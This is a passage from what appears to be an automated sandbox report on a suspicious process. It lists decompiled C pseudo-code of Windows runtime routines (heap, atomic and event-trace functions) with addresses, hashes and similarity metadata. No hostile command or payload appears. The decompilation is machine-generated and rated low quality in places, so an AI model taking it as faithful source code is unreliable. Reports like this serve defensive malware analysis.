											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0xb7b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0xb784c0;
																			if(_t82 >=  *0xb784c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E00B59063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E00A8922A(_t99);
										_t64 = E00AA7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E00B58B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0xb786c0; // 0x6307b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0xb786b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0xb786bc;
													_t87 = 0xb786b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E00A89240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0xb786c4;
												_t87 = 0xb786c0;
												L27:
												E00AB9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E00ADD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0xb75388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0xb7538c = _t51;
						goto L6;
					}
				}
			}




















                                                    0x00a89082
                                                    0x00a89083
                                                    0x00a89084
                                                    0x00a89085
                                                    0x00a89087
                                                    0x00a89096
                                                    0x00a89098
                                                    0x00a89098
                                                    0x00a8909e
                                                    0x00a890a8
                                                    0x00a890e7
                                                    0x00a890e7
                                                    0x00a890aa
                                                    0x00a890b0
                                                    0x00a890b7
                                                    0x00a890bd
                                                    0x00a890dd
                                                    0x00a890e6
                                                    0x00a890bf
                                                    0x00a890bf
                                                    0x00a890c7
                                                    0x00a890cf
                                                    0x00a890f1
                                                    0x00a890f2
                                                    0x00a890f4
                                                    0x00a890f5
                                                    0x00a890f6
                                                    0x00a890f7
                                                    0x00a890f8
                                                    0x00a890f9
                                                    0x00a890fa
                                                    0x00a890fb
                                                    0x00a890fc
                                                    0x00a890fd
                                                    0x00a890fe
                                                    0x00a890ff
                                                    0x00a89100
                                                    0x00a89102
                                                    0x00a89107
                                                    0x00a8910c
                                                    0x00a89110
                                                    0x00a89113
                                                    0x00a89115
                                                    0x00a89136
                                                    0x00a8913f
                                                    0x00a89143
                                                    0x00ae37e4
                                                    0x00ae37e4
                                                    0x00a89117
                                                    0x00a89117
                                                    0x00a8911d
                                                    0x00000000
                                                    0x00a8911f
                                                    0x00a8911f
                                                    0x00a89125
                                                    0x00000000
                                                    0x00a89127
                                                    0x00a8912d
                                                    0x00a89130
                                                    0x00a89134
                                                    0x00a89158
                                                    0x00a8915d
                                                    0x00a89161
                                                    0x00a89168
                                                    0x00ae3715
                                                    0x00a8916e
                                                    0x00a8916e
                                                    0x00a89175
                                                    0x00a89177
                                                    0x00a8917e
                                                    0x00a8917f
                                                    0x00a89182
                                                    0x00a89182
                                                    0x00a89187
                                                    0x00a89187
                                                    0x00a8918a
                                                    0x00a8918d
                                                    0x00a8918f
                                                    0x00a89192
                                                    0x00a89195
                                                    0x00a89198
                                                    0x00a89198
                                                    0x00a89198
                                                    0x00a8919a
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae371f
                                                    0x00ae3721
                                                    0x00ae3727
                                                    0x00ae372f
                                                    0x00ae3733
                                                    0x00ae3735
                                                    0x00ae3738
                                                    0x00ae373b
                                                    0x00ae373d
                                                    0x00ae3740
                                                    0x00000000
                                                    0x00ae3746
                                                    0x00ae3746
                                                    0x00ae3749
                                                    0x00000000
                                                    0x00ae374f
                                                    0x00ae374f
                                                    0x00ae3751
                                                    0x00ae3757
                                                    0x00ae3759
                                                    0x00ae375c
                                                    0x00ae375c
                                                    0x00ae375e
                                                    0x00ae375e
                                                    0x00ae3761
                                                    0x00ae3764
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae3766
                                                    0x00ae3768
                                                    0x00ae37a3
                                                    0x00ae37a3
                                                    0x00ae37a5
                                                    0x00ae37a7
                                                    0x00ae37ad
                                                    0x00ae37b0
                                                    0x00ae37b2
                                                    0x00ae37bc
                                                    0x00ae37c2
                                                    0x00ae37c2
                                                    0x00ae37b2
                                                    0x00a89187
                                                    0x00a89187
                                                    0x00a8918a
                                                    0x00a8918d
                                                    0x00a8918f
                                                    0x00a89192
                                                    0x00a89195
                                                    0x00000000
                                                    0x00a89195
                                                    0x00000000
                                                    0x00ae376a
                                                    0x00ae376a
                                                    0x00ae376a
                                                    0x00ae376c
                                                    0x00ae376c
                                                    0x00ae376f
                                                    0x00ae3775
                                                    0x00000000
                                                    0x00000000
                                                    0x00ae3777
                                                    0x00ae3779
                                                    0x00ae3782
                                                    0x00ae3787
                                                    0x00ae3789
                                                    0x00ae3790
                                                    0x00ae3790
                                                    0x00ae378b
                                                    0x00ae378b
                                                    0x00ae378b
                                                    0x00ae3792
                                                    0x00ae3795
                                                    0x00000000
                                                    0x00ae3795
                                                    0x00000000
                                                    0x00ae3779
                                                    0x00ae3798
                                                    0x00000000
                                                    0x00ae3798
                                                    0x00000000
                                                    0x00ae3768
                                                    0x00ae379b
                                                    0x00ae379b
                                                    0x00ae3751
                                                    0x00ae3749
                                                    0x00000000
                                                    0x00ae3740
                                                    0x00a891a0
                                                    0x00a891a3
                                                    0x00a891a9
                                                    0x00a891b0
                                                    0x00000000
                                                    0x00a891b0
                                                    0x00a89187
                                                    0x00a891b4
                                                    0x00a891b4
                                                    0x00a891bb
                                                    0x00a891c0
                                                    0x00a891c5
                                                    0x00a891c7
                                                    0x00ae37da
                                                    0x00a891cd
                                                    0x00a891cd
                                                    0x00a891cd
                                                    0x00a891d2
                                                    0x00a891d5
                                                    0x00a89239
                                                    0x00a89239
                                                    0x00a891d7
                                                    0x00a891db
                                                    0x00a891e1
                                                    0x00a891e7
                                                    0x00a891fd
                                                    0x00a89203
                                                    0x00a8921e
                                                    0x00a89223
                                                    0x00000000
                                                    0x00a89205
                                                    0x00a89205
                                                    0x00a89208
                                                    0x00a8920c
                                                    0x00a89214
                                                    0x00a89214
                                                    0x00a8920c
                                                    0x00a891e9
                                                    0x00a891e9
                                                    0x00a891ee
                                                    0x00a891f3
                                                    0x00a891f3
                                                    0x00a891f3
                                                    0x00a891e7
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00a89134
                                                    0x00a89125
                                                    0x00a8911d
                                                    0x00a8914e
                                                    0x00a890d1
                                                    0x00a890d1
                                                    0x00a890d3
                                                    0x00a890d6
                                                    0x00a890d8
                                                    0x00000000
                                                    0x00a890d8
                                                    0x00a890cf

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec512d100f0add2216d22e79cc94f8be0d6bbba00a936f365ba90502323bc4fc
                                                    • Instruction ID: 4f648a85a1fd9863706725dc113e18fd0bc2b227698b6f8246213d7f7b2e999a
                                                    • Opcode Fuzzy Hash: ec512d100f0add2216d22e79cc94f8be0d6bbba00a936f365ba90502323bc4fc
                                                    • Instruction Fuzzy Hash: A801A4726016048FD325AF18D840B667BF9EB45361F2A4076E5199B7A1C7B4EC81CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B1C450 Relevance: .1, Instructions: 53COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 46%
                                                    			E00B1C450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E00AC9910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E00AC95B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E00AC95D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E00AC95D0();
				return L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                                    0x00b1c458
                                                    0x00b1c45d
                                                    0x00b1c466
                                                    0x00b1c468
                                                    0x00b1c469
                                                    0x00b1c46a
                                                    0x00b1c46b
                                                    0x00b1c46e
                                                    0x00b1c46f
                                                    0x00b1c471
                                                    0x00b1c476
                                                    0x00b1c476
                                                    0x00b1c47c
                                                    0x00b1c47e
                                                    0x00b1c480
                                                    0x00b1c480
                                                    0x00b1c483
                                                    0x00b1c484
                                                    0x00b1c486
                                                    0x00b1c488
                                                    0x00b1c48f
                                                    0x00b1c491
                                                    0x00b1c493
                                                    0x00b1c493
                                                    0x00b1c48f
                                                    0x00b1c498
                                                    0x00b1c49e
                                                    0x00b1c4ad
                                                    0x00b1c4ad
                                                    0x00b1c4b2
                                                    0x00b1c4b4
                                                    0x00b1c4cd

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID:
                                                    • API String ID: 2994545307-0
                                                    • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                    • Instruction ID: 49553ba2e9158cd64177e6d084822f5cf703e2a9f61247a363ac0c295bc1e331
                                                    • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                                    • Instruction Fuzzy Hash: FB019272180609FFE721AF65CD95EA3FB6DFF54390F514529F114476A1CB31ACA0CAA0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B54015 Relevance: .0, Instructions: 49COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 86%
                                                    			E00B54015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E00AA2280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E00AA2280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0xb786ac);
					E00A8F900(0xb786d4, _t28);
					E00A9FFB0(0xb786ac, _t28, 0xb786ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E00A9FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L00AA77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                                    0x00b5401a
                                                    0x00b5401e
                                                    0x00b54023
                                                    0x00b54028
                                                    0x00b54029
                                                    0x00b5402b
                                                    0x00b5402f
                                                    0x00b54043
                                                    0x00b54046
                                                    0x00b54051
                                                    0x00b54057
                                                    0x00b5405f
                                                    0x00b54062
                                                    0x00b54067
                                                    0x00b5406f
                                                    0x00b5407c
                                                    0x00b5407c
                                                    0x00b5408c
                                                    0x00b5408c
                                                    0x00b54097

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8389d388d75fb730345e2693a2254a2e227ff6a1b8d8042dd653a981d4aa1de9
                                                    • Instruction ID: b0c738586185e7b3ebd5b311b136fc863bbb4348b7d0d6d81220c8a232c8444e
                                                    • Opcode Fuzzy Hash: 8389d388d75fb730345e2693a2254a2e227ff6a1b8d8042dd653a981d4aa1de9
                                                    • Instruction Fuzzy Hash: 83018F72241A457FC611AB69CE85F67B7ECEB46760B000265F50883A92CB24EC51CBE4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B414FB Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E00B414FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xb7d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00ACFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E00AA7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                    0x00b414fb
                                                    0x00b414fb
                                                    0x00b4150a
                                                    0x00b41514
                                                    0x00b41519
                                                    0x00b4151b
                                                    0x00b41526
                                                    0x00b4152c
                                                    0x00b41534
                                                    0x00b41537
                                                    0x00b4153a
                                                    0x00b41545
                                                    0x00b41557
                                                    0x00b41547
                                                    0x00b41550
                                                    0x00b41550
                                                    0x00b41562
                                                    0x00b41563
                                                    0x00b41565
                                                    0x00b4156a
                                                    0x00b4157f

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d5aa51f6e188820333125a2024abc401a66f799f7bfc18b340939f2349b1fea
                                                    • Instruction ID: 5a5b5a5d8d9bf45757e6ce3ab5dfb0fcd2909fb53aaf9af4bfb920da15dde824
                                                    • Opcode Fuzzy Hash: 5d5aa51f6e188820333125a2024abc401a66f799f7bfc18b340939f2349b1fea
                                                    • Instruction Fuzzy Hash: 52019E71A00248AFCB00DFA9D946FAEBBB8EF44700F00406AF915EB281DA70DA40CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B4138A Relevance: .0, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 61%
                                                    			E00B4138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0xb7d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E00ACFA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E00AA7D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                                    0x00b4138a
                                                    0x00b4138a
                                                    0x00b41399
                                                    0x00b413a3
                                                    0x00b413a8
                                                    0x00b413aa
                                                    0x00b413b5
                                                    0x00b413bb
                                                    0x00b413c3
                                                    0x00b413c6
                                                    0x00b413c9
                                                    0x00b413d4
                                                    0x00b413e6
                                                    0x00b413d6
                                                    0x00b413df
                                                    0x00b413df
                                                    0x00b413f1
                                                    0x00b413f2
                                                    0x00b413f4
                                                    0x00b413f9
                                                    0x00b4140e

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 39ef62c3f1fafd1fd6bd76b3e770c402c27e8dc51d7102e1bf33206b2c2cb94c
                                                    • Instruction ID: c18d3a3343b242a643c17afbb3e21f69a7d22dc5b38c22fc64225ffae4ccee7a
                                                    • Opcode Fuzzy Hash: 39ef62c3f1fafd1fd6bd76b3e770c402c27e8dc51d7102e1bf33206b2c2cb94c
                                                    • Instruction Fuzzy Hash: B4015271E00318BFCB14DFA9D946FAEB7B8EF44750F01406AB905EB281DA749A41CB95
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A858EC Relevance: .0, Instructions: 47COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 91%
                                                    			E00A858EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0xb7d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0xa65c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E00A85943() != 0 &&  *0xb75320 > 5) {
					E00B07B5E( &_v44, _t27);
					_t22 =  &_v28;
					E00B07B5E( &_v28, _t28);
					_t11 = E00B07B9C(0xb75320, 0xa6bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E00ACB640(_t11, _t17, _v8 ^ _t29, 0xa6bf15, _t27, _t28);
			}















                                                    0x00a858fb
                                                    0x00a858fe
                                                    0x00a85906
                                                    0x00a8590a
                                                    0x00a8593c
                                                    0x00a8593c
                                                    0x00a8590c
                                                    0x00a8590c
                                                    0x00a85911
                                                    0x00000000
                                                    0x00a85913
                                                    0x00a85913
                                                    0x00a85913
                                                    0x00a85911
                                                    0x00a8591d
                                                    0x00ae1035
                                                    0x00ae103c
                                                    0x00ae103f
                                                    0x00ae1056
                                                    0x00ae1056
                                                    0x00a8593b

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 753737ab700e234eab2caedaf944460d2eafeecb5472e066f7e3f93df90ca98a
                                                    • Instruction ID: ab73342d3b9838e29e5f4d2df8debcfce8eea0e8e00b3f4776dc5be5e696a10b
                                                    • Opcode Fuzzy Hash: 753737ab700e234eab2caedaf944460d2eafeecb5472e066f7e3f93df90ca98a
                                                    • Instruction Fuzzy Hash: 42018431E00908DBC714EB35DC11AAEBBB8EF40360F5500A9ED059B291DE70EE018794
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00A9B02A Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00A9B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E00AA7D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E00B07016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                                    0x00a9b037
                                                    0x00a9b039
                                                    0x00a9b03b
                                                    0x00a9b040
                                                    0x00aea60e
                                                    0x00000000
                                                    0x00000000
                                                    0x00aea61d
                                                    0x00a9b04b
                                                    0x00a9b04e
                                                    0x00aea627
                                                    0x00aea634
                                                    0x00000000
                                                    0x00000000
                                                    0x00aea641
                                                    0x00aea653
                                                    0x00aea643
                                                    0x00aea64c
                                                    0x00aea64c
                                                    0x00aea65b
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00aea66c
                                                    0x00a9b057
                                                    0x00a9b057
                                                    0x00a9b057
                                                    0x00a9b046
                                                    0x00a9b046
                                                    0x00000000

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                    • Instruction ID: ac349a255d11c57f909b3a4a50b4eef96f011dbc7d8bfb30badc06e282c81565
                                                    • Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
                                                    • Instruction Fuzzy Hash: 4B018F323149C09FD722D71EDA88F6777E8EB56750F0900A5F919CBAA1E768EC40C631
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B51074 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00B51074(intOrPtr __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E00B5165E(__ebx, 0xb78ae4, (__edx -  *0xb78b04 >> 0x14) + (__edx -  *0xb78b04 >> 0x14), __edi, __ecx, (__edx -  *0xb78b04 >> 0x14) + (__edx -  *0xb78b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E00B4AFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E00AA7D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E00B3FE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}











                                                    0x00b51074
                                                    0x00b51080
                                                    0x00b51082
                                                    0x00b5108a
                                                    0x00b5108f
                                                    0x00b51093
                                                    0x00b510ab
                                                    0x00b510ab
                                                    0x00b510c3
                                                    0x00b510cf
                                                    0x00b510e1
                                                    0x00b510d1
                                                    0x00b510da
                                                    0x00b510da
                                                    0x00b510e9
                                                    0x00b510f5
                                                    0x00b510f5
                                                    0x00b510fe

                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.331478562.0000000000A60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A60000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_a60000_tqxwmam.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00381006b141159f236e663c39c33ddbe9b02bdcc6f3494bd2908b87c593100d
                                                    • Instruction ID: d8f355ffdc490547d2935a23b80d610e5d6437c86090c40c7d0e3695bd7c3744
                                                    • Opcode Fuzzy Hash: 00381006b141159f236e663c39c33ddbe9b02bdcc6f3494bd2908b87c593100d
                                                    • Instruction Fuzzy Hash: C701D4725047819FC711EB68C945B1A77E5EB84311F08CAA9FC86836D1EE31D988CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B3FEC0 Relevance: .0, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 59%
                                                    			E00B3FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0xb7d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E00ACFA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E00AA7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E00ACB640(E00AC9AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                    0x00b3fec0
                                                    0x00b3fec0
                                                    0x00b3fecf
                                                    0x00b3fed9
